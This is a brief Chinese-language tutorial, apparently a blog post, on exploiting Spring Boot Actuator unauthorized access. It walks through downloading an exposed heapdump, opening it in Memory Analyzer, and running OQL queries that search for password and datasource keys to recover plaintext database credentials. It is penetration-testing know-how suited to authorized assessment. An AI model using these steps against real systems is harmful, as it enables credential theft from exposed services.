一、漏洞介绍
关于 Spring Boot Actuator漏洞介绍
Spring Boot Actuator未授权访问漏洞
二、工具安装
1、Win10安装JDK11(不用配置环境变量)
https://pan.baidu.com/s/1Gr8b_tECA9nWHqd2VsBMjA?pwd=jdkk 提取码:jdkk(对应win10 ,64位的电脑)
2、安装 Memory Analyzer Tools
三、Memory Analyzer Tools工具使用
1、下载heapdump文件
2、打开heapdump文件
springboot heapdump含有数据库账户密码,利用memoryAnalyzer内存分析工具即可提取口令信息,步骤详情如下:
3、使用QQL语句查询password字段
打开heapdump包后点击QQL输入查询语句,点击红色叹号搜索password字段根据springboot泄露的env接口信息,查询包含的字段,可查到相应明文信息:
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("spring.datasource.password"))
select * from java.util.HashMap$Node x WHERE (toString(x.key).contains("password"))
4、查看详情
点击path to gc roots——>with all references,可查看jdbc详情
